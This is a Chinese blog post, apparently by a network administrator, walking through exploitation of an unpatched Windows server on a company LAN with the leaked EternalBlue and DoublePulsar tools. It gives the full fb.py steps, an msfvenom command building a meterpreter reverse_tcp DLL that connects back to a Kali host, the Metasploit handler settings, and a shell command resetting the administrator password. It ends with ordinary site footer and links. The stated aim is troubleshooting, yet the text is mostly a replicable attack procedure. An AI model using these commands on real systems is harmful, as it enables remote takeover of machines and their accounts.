局域网永恒之蓝病毒发包的解决方案之二

济南小老虎
关注文章
TinyMind专栏频道

1. 使用shadowbroker 的 eternalblue还有 doublepulsar 实现注入到目标机器的进程, 然后使用kali下的msf 获取到有病毒机器的shell 然后修改密码 查看问题等.

根据网上的教程来进行处理 以及复现等

教程地址:

http://blog.csdn.net/claygrit/article/details/77284739
http://blog.csdn.net/feier7501/article/details/8852113

1. 需要的环境以及软件:

1. 目标机器 10.24.11.117 公司内的服务器,未更新微软永恒之蓝MS17-010补丁。

2. Win7x86的机器 10.24.160.37 安装python2.6 安装pywin32 下载有shadowbroker-master的文件(包含 eternalblue 以及 doublepulsar)

3. kali linux 机器, 主要是生成payload以及进行远程控制。

2. 步骤

1. Win7x86的机器安装以及修改,

安装python2.6x86 修改环境变量

安装 pywin32

解压送 shadowbroker 的zip包 cd 到windows 目录下

根据fb.py 新增加空目录 listeneringports

以及根据shadowbroker 里面的文件 修改resource 目录以及修改logs目录

安装以及修改完成后。打开cmd

cd到shadowbroker.../windows的目录下 执行 fb.py

开始自行操作

输入target ip 地址 本次的例子中未 10.24.11.117

callback 的ip地址是 win7的攻击机自己 地址是 10.24.160.37

不适用重定向 输入 no

后面的自己选择 等着出来 fb> 就说明可以正常使用了

2. 在fb> 后进行输入

输入 use eternalblue

一路next即可 在 选择 delivery mechanism 时选择FB

提示 eternalblue successed 即可。

3. 创建payload

shell 到 kali linux中 执行命令

其中 LHOST输入的时kali linux 自己的地址 端口号 理论上随便一个即可 msfvenom 的命令一点都不清楚 这一块需要继续加强学习

 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.24.160.38 LPORT=5555 -f dll>launcher.dll

需要将launcher.dll 放到 win7x86的攻击机机器上面。 例子中时 10.24.168.37 比如 放到c:\launcher.dll

4. 还是在kali中: 输入命令

msfconsole

打开msf框架,这里的目的 应该是开启监听 能够返回 上一步中生成的paylaod 在target ip 机器中的返回数据 用来操作被攻击的机器

主要命令 第一步 应嘎是使用handler

为什么 不知道。。。 命令为:

use exploit/multi/handler

然后输入上一步相同的参数内容

set LHOST 10.24.160.38
set LPORT 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp 
exploit

提示started 即可

5. 返回win7x86的攻击机器

应该还是在fb>的输入界面

直接输入 use doublepulsar

一路next即可 就是搞清楚时x86 还是x64的目标机器 以及正确选中 第三步中生成的launcher.dll的路径以及文件名

以及选择 rundll的模式 后输入路径

正常的话 会提示 doublepulsar succeeded 即可

6. 再次返回 kali

会提示 meterpreter session 1 opened 说明已经建立了链接

回车会发现 还是会进入msf 的命令行

这个时候输入 sessions 显示已经打开的链接

然后执行命令 sessions -i 1 插入到链接中

这个时候 会发现命令提示符 会变成 meterpreter> 说明已经成功

这时 应该有很多挺好玩的玩法, 不过这里为了解决问题来搞的

所以这个时候 我选择输入 shell 会进入 c:\windows\system32\的命令行目录下 说明已经获取了 target 机器的shell权限

net user administrator newpassword 修改一下密码 自己就可以远程登录了。。

解决了 不知道是谁的机器 以及连不上的问题

这个地方有非常值得学习的地方msf 还有 shadowbroker 只是知道一点点的东西 还是太白了。。

优质内容筛选与推荐>>
1、Storm+kafka的HelloWorld初体验
2、Spring MVC @CookieValue注解
3、首套房贷利率回调 刚需出手买房前先做功课
4、VQuery高级特性
5、九九乘法表


长按二维码向我转账

受苹果公司新规定影响,微信 iOS 版的赞赏功能被关闭,可通过二维码转账支持公众号。

    阅读
    好看
    已推荐到看一看
    你的朋友可以在“发现”-“看一看”看到你认为好看的文章。
    已取消,“好看”想法已同步删除
    已推荐到看一看 和朋友分享想法
    最多200字,当前共 发送

    已发送

    朋友将在看一看看到

    确定
    分享你的想法...
    取消

    分享想法到看一看

    确定
    最多200字,当前共

    发送中

    网络异常,请稍后重试

    微信扫一扫
    关注该公众号

    0 收藏 举报




    联系我们

    欢迎来到TinyMind。

    关于TinyMind的内容或商务合作、网站建议,举报不良信息等均可联系我们。

    TinyMind客服邮箱:support@tinymind.net.cn

    TinyMind.net.cn,专业AI技术社区